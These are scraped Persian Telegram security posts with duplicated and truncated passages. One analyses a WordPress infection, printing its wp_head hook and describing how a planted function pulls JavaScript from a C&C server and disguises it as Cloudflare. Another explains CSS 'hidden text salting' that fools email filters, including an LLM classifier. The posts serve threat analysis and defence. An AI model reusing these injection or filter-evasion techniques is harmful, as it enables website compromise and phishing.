add_action('wp_head', 'ti_custom_javanoscript');
تحلیل دقیق عملکرد کد:
1۔ add_action('wp_head' , 'ti_custom_javanoscript'); : این خط، قلب مکانیزم حمله است. با استفاده از هوک (hook) وردپرسی
wp_head ، تابع ti_custom_javanoscript در هر بار بارگذاری صفحه (page load) در تمام بخشهای وبسایت، درست در داخل تگ <head> اجرا میشود. این تضمین میکند که کد مخرب قبل از هر اسکریپت دیگری بارگذاری و اجرا شود.2۔ wp_remote_post(...) : این تابع وردپرسی یک درخواست HTTP POST به سرور فرماندهی و کنترل (C\&C) مهاجم به آدرس
hxxps://brazilc[.]com/ads.php ارسال میکند. در بدنه (body) این درخواست، آدرس وبسایت آلوده (home_url()) نیز ارسال میشود که احتمالاً برای ردیابی قربانیان توسط مهاجمان استفاده میشود.3۔ echo wp_remote_retrieve_body($response); : این بخش، حیاتیترین قسمت است. پاسخ دریافت شده از سرور C\&C (که حاوی payload جاوا اسکریپت مخرب است) بدون هیچگونه اعتبارسنجی یا پاکسازی، مستقیماً در خروجی HTML صفحه چاپ (echo) میشود. این تکنیک به مهاجم اجازه میدهد تا به صورت پویا و از راه دور، محتوای مخرب را در لحظه به مرورگر بازدیدکنندگان تزریق کند.
فاز سوم: تحلیل Payload جاوا اسکریپت
پاسخی که از سرور C\&C بازگردانده میشود، یک payload جاوا اسکریپت چندمرحلهای است که یک حمله دومرحلهای (Two-Pronged Attack) را اجرا میکند:
مرحله اول: سیستم توزیع ترافیک
اولین بخش از payload، اسکریپتی را از دامنه
porsasystem[.]com (مشخصاً فایل 6m9x.js) بارگذاری میکند. این دامنه به عنوان یک سیستم توزیع ترافیک (TDS) عمل میکند. یک TDS، سرویسی است که بازدیدکنندگان را بر اساس پارامترهای مختلفی مانند موقعیت جغرافیایی، نوع سیستمعامل، مرورگر و... پروفایل کرده و سپس آنها را به مخربترین یا سودآورترین مقصد بعدی هدایت میکند. این مقصد میتواند شامل موارد زیر باشد:* صفحات فیشینگ
* سایتهای تبلیغاتی مخرب
* کیتهای بهرهبرداری (Exploit Kits)
* دانلود بدافزارهای دیگر (مانند باجافزار یا تروجانهای بانکی)
این اسکریپت مسئول اصلی هدایتهای ناخواسته و نمایش پاپآپهایی است که توسط کاربر گزارش شده است.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
مرحله دوم: تکنیکهای فرار و پنهانسازی
بخش دوم payload، یک تکنیک هوشمندانه برای فرار از شناسایی توسط ابزارهای امنیتی و تحلیلگران به کار میگیرد:
1. ایجاد Iframe مخفی: یک
2. تقلید از Cloudflare: درون این iframe مخفی، کدی تزریق میشود که خود را به عنوان یک اسکریپت تأیید هویت قانونی Cloudflare جا میزند (
3. دور زدن بهینهسازها: در کد اسکریپت از دو مشخصه (attribute) کلیدی استفاده شده است:
*۔ data-cfasync='false': این مشخصه به سرویس بهینهسازی
*۔ async: این مشخصه باعث میشود اسکریپت به صورت غیرهمزمان (asynchronously) بارگذاری شود. این یعنی بارگذاری آن مانع از رندر شدن بقیه محتوای صفحه نمیشود و در نتیجه، تأثیر منفی بر سرعت بارگذاری سایت (از دید کاربر) به حداقل میرسد و حمله کمتر قابل توجه خواهد بود.
شاخصهای نفوذ
* دامنههای مخرب:
۔*
۔*
* مسیر فایل آلوده:
۔*
* قطعه کد مخرب:
* تابع
@NullError_ir
بخش دوم payload، یک تکنیک هوشمندانه برای فرار از شناسایی توسط ابزارهای امنیتی و تحلیلگران به کار میگیرد:
1. ایجاد Iframe مخفی: یک
iframe با ابعاد ۱ در ۱ پیکسل (1x1) به صورت مخفی در صفحه ایجاد میشود. این iframe برای چشم انسان نامرئی است اما به مرورگر اجازه میدهد محتوای خارجی را در پسزمینه بارگذاری کند.2. تقلید از Cloudflare: درون این iframe مخفی، کدی تزریق میشود که خود را به عنوان یک اسکریپت تأیید هویت قانونی Cloudflare جا میزند (
cdn-cgi/challenge-platform/noscripts/jsd/main.js) . از آنجایی که Cloudflare یک سرویس CDN و امنیتی بسیار رایج است، بسیاری از فایروالها، سیستمهای تشخیص نفوذ (IDS) و تحلیلگران امنیتی ممکن است ترافیک مربوط به آن را قانونی تلقی کرده و نادیده بگیرند (whitelisting). این یک روش بسیار مؤثر برای پنهان کردن فعالیت مخرب در میان ترافیک عادی است.3. دور زدن بهینهسازها: در کد اسکریپت از دو مشخصه (attribute) کلیدی استفاده شده است:
*۔ data-cfasync='false': این مشخصه به سرویس بهینهسازی
Rocket Loader کلودفلر دستور میدهد که این اسکریپت را نادیده بگیرد و تغییری در آن ایجاد نکند. این کار از شکسته شدن کد مخرب توسط ابزارهای بهینهسازی جلوگیری میکند.*۔ async: این مشخصه باعث میشود اسکریپت به صورت غیرهمزمان (asynchronously) بارگذاری شود. این یعنی بارگذاری آن مانع از رندر شدن بقیه محتوای صفحه نمیشود و در نتیجه، تأثیر منفی بر سرعت بارگذاری سایت (از دید کاربر) به حداقل میرسد و حمله کمتر قابل توجه خواهد بود.
شاخصهای نفوذ
* دامنههای مخرب:
۔*
brazilc[.]com (سرور C\&C)۔*
porsasystem[.]com (سرور توزیع ترافیک - TDS)* مسیر فایل آلوده:
۔*
wp-content/themes/[نام-قالب-فعال]/functions.php* قطعه کد مخرب:
* تابع
ti_custom_javanoscript() که به هوک wp_head متصل شده است.@NullError_ir
آقای امید میرزائی محقق و سرپرست تیم امنیتی سیسکو تالوس خبر از کشف یک تکنیک فریبنده به نام "Hidden Text Salting" داد.
تحلیل تکنیک "Hidden Text Salting": سوءاستفاده از CSS برای فریب سیستمهای امنیتی ایمیل
بر اساس گزارش ایشان، مهاجمان به طور فزایندهای از یک تکنیک فریبنده به نام "Hidden Text Salting" برای دور زدن راهکارهای امنیتی ایمیل استفاده میکنند. این روش بر پایه سوءاستفاده از ویژگیهای CSS (Cascading Style Sheets) برای تزریق و پنهانسازی محتوای بیربط (که "Salt" یا "نمک" نامیده میشود) در بخشهای مختلف ایمیلها استوار است. هدف اصلی این تکنیک، مختل کردن و فریب دادن سیستمهای تشخیص خودکار، از جمله الگوریتمهای یادگیری ماشین و مدلهای زبانی بزرگ (LLMs) است.
چرا مهاجمان از Hidden Text Salting استفاده میکنند؟
این تکنیک دو هدف اصلی را دنبال میکند:
1. فرار مستقیم از تشخیص (Direct Evasion): مهاجمان با افزودن محتوای بیربط و تصادفی به بدنه ایمیل، امضاها (Signatures) و الگوهای متنی که توسط سیستمهای امنیتی برای شناسایی ایمیلهای مخرب استفاده میشوند را برهم میزنند. این کار تحلیل محتوای ایمیل را برای موتورهای تشخیص دشوارتر میکند.
2. اختلال در فرآیندهای جانبی (Indirect Evasion): این روش میتواند سایر بخشهای خط لوله تحلیل امنیتی را نیز تحت تأثیر قرار دهد. برای مثال، با تزریق کلماتی از یک زبان دیگر (مانند فرانسوی در یک ایمیل انگلیسی)، میتوانند ماژولهای تشخیص زبان را به اشتباه بیندازند و باعث شوند فیلترهای اسپم مبتنی بر زبان، به درستی عمل نکنند.
محتوای "Salt" در کدام بخشهای ایمیل تزریق میشود؟
تحقیقات نشان میدهد که مهاجمان عمدتاً در چهار بخش کلیدی ایمیل محتوای پنهان را جایگذاری میکنند:
1۔ Preheader: متن کوتاهی که در پیشنمایش اینباکس، بلافاصله بعد از عنوان ایمیل نمایش داده میشود. مهاجمان میتوانند در این بخش، متون بیربطی را با استفاده از CSS پنهان کنند تا موتورهای تحلیل را فریب دهند.
2۔ Header: بخشهای بالایی ایمیل که کمتر متداول است اما همچنان به عنوان محلی برای تزریق محتوای پنهان استفاده میشود.
3۔ پیوستها (Attachments): به خصوص در پیوستهای HTML، مهاجمان کاراکترها یا کامنتهای بیربط را بین کدهای مهم (مانند رشتههای Base64) قرار میدهند تا تحلیل استاتیک فایل را پیچیده و فرآیند استخراج URLهای مخرب را دشوار سازند.
4۔ بدنه ایمیل (Email Body): این متداولترین محل برای تزریق Salt است. مهاجمان کاراکترهای پنهان را بین کلمات کلیدی (مانند نام برندها) قرار میدهند تا شناسایی آنها توسط فیلترهای محتوا را مختل کنند.
انواع محتوای مورد استفاده به عنوان Salt
سه نوع محتوای اصلی برای این هدف به کار گرفته میشود:
1. کاراکترها (Characters): شامل کاراکترهای تصادفی که بین کلمات کلیدی قرار میگیرند یا کاراکترهای خاص با عرض صفر (Zero-Width) مانند ZWSP و ZWNJ که بین حروف یک برند (مانند Norton LifeLock) تزریق میشوند. این کاراکترها با چشم غیرمسلح دیده نمیشوند اما توسط پارسرهای ایمیل به عنوان بخشی از رشته متنی شناسایی میشوند.
2. پاراگرافها (Paragraphs): جملات و عبارات کاملاً بیربط (مثلاً به زبان آلمانی در یک ایمیل فیشینگ انگلیسی) که در بدنه ایمیل گنجانده شده و سپس با استفاده از CSS کاملاً پنهان میشوند.
3. کامنتها (Comments): به ویژه در پیوستهای HTML، کامنتهای بیربط زیادی بین کدهای JavaScript یا سایر بخشهای کلیدی قرار داده میشود تا تحلیل استاتیک را دشوار کند.
تکنیکهای رایج CSS برای پنهانسازی محتوا
مهاجمان از سه دسته اصلی ویژگیهای CSS برای نامرئی کردن Salt سوءاستفاده میکنند:
1. ویژگیهای متنی (Text Properties):
*۔
font-size: تنظیم اندازه فونت روی صفر یا یک مقدار بسیار کوچک.*۔
color: تنظیم رنگ متن به همان رنگ پسزمینه (مثلاً سفید روی سفید).2. ویژگیهای نمایش و شفافیت (Visibility and Display Properties):
*۔
opacity: 0: المان را کاملاً شفاف و نامرئی میکند.*۔
display: none: المان را به طور کامل از چیدمان صفحه حذف میکند.*۔
visibility: hidden: المان را پنهان میکند اما فضای آن در چیدمان صفحه حفظ میشود.3. ویژگیهای اندازه و برش (Clipping and Sizing Properties):
*۔
width: 0 یا height: 0: عرض یا ارتفاع کانتینر حاوی متن Salt را صفر قرار میدهند.*۔
overflow: hidden: محتوای اضافی یک کانتینر کوچک را پنهان میکنند. برای مثال، متن بزرگی را در یک دایره با شعاع صفر قرار داده و سرریز آن را مخفی میکنند.شیوع این تکنیک در ایمیلهای اسپم در مقابل ایمیلهای قانونی
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
تحلیلها نشان میدهد که استفاده از تکنیکهای پنهانسازی محتوا با CSS به طور قابل توجهی در ایمیلهای اسپم و تهدیدآمیز شایعتر از ایمیلهای قانونی است. اگرچه در ایمیلهای قانونی نیز از این ویژگیهای CSS برای اهداف مشروع مانند (Responsive Design) یا (Tracking Pixels) استفاده میشود، اما تزریق محتوای متنی بیربط (Salting) تقریباً همیشه در ایمیلهای مخرب مشاهده میشود.
تأثیر Hidden Text Salting بر راهکارهای امنیتی پیشرفته
این تکنیک نه تنها فیلترهای ساده مبتنی بر کلمات کلیدی را دور میزند، بلکه میتواند راهکارهای پیشرفته مبتنی بر هوش مصنوعی و مدلهای زبانی بزرگ (LLMs) را نیز به چالش بکشد.
یک مثال عملی نشان میدهد که چگونه تزریق مقدار کمی متن پنهان و بیربط میتواند خروجی یک LLM (مانند GPT-4o mini) را در تشخیص "قصد" (Intent) و "احساس" (Sentiment) یک ایمیل فیشینگ تغییر دهد. برای مثال، یک ایمیل که "قصد" آن به درستی "خنثی" (Neutral) تشخیص داده شده بود، با افزودن یک متن Salt پنهان، به "مثبت" (Positive) تغییر یافت و از دید سیستم امنیتی مشروع جلوه کرد. به همین ترتیب، "احساس" یک ایمیل که "درخواست اقدام" (Request Action) بود، با این تکنیک به "زمانبندی جلسه" (Schedule Meeting) تغییر پیدا کرد.
این مثالها نشان میدهد که اگر راهکارهای امنیتی مدرن بدون آگاهی از این تکنیکهای متخاصم و بدون اقدامات متقابل مناسب به کار گرفته شوند، تا چه حد میتوانند آسیبپذیر باشند.
@NullError_ir
تأثیر Hidden Text Salting بر راهکارهای امنیتی پیشرفته
این تکنیک نه تنها فیلترهای ساده مبتنی بر کلمات کلیدی را دور میزند، بلکه میتواند راهکارهای پیشرفته مبتنی بر هوش مصنوعی و مدلهای زبانی بزرگ (LLMs) را نیز به چالش بکشد.
یک مثال عملی نشان میدهد که چگونه تزریق مقدار کمی متن پنهان و بیربط میتواند خروجی یک LLM (مانند GPT-4o mini) را در تشخیص "قصد" (Intent) و "احساس" (Sentiment) یک ایمیل فیشینگ تغییر دهد. برای مثال، یک ایمیل که "قصد" آن به درستی "خنثی" (Neutral) تشخیص داده شده بود، با افزودن یک متن Salt پنهان، به "مثبت" (Positive) تغییر یافت و از دید سیستم امنیتی مشروع جلوه کرد. به همین ترتیب، "احساس" یک ایمیل که "درخواست اقدام" (Request Action) بود، با این تکنیک به "زمانبندی جلسه" (Schedule Meeting) تغییر پیدا کرد.
این مثالها نشان میدهد که اگر راهکارهای امنیتی مدرن بدون آگاهی از این تکنیکهای متخاصم و بدون اقدامات متقابل مناسب به کار گرفته شوند، تا چه حد میتوانند آسیبپذیر باشند.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudsek
An Insider Look At The IRGC-linked APT35 Operations: Ep1 & Ep2 | CloudSEK
CloudSEK’s TRIAD team analyzed leaked internal documents from Iran-linked APT35 (Charming Kitten), revealing its structure, tools, and espionage operations. The group—tied to the IRGC—targeted government, legal, energy, and financial sectors across the Middle…
Please open Telegram to view this post
VIEW IN TELEGRAM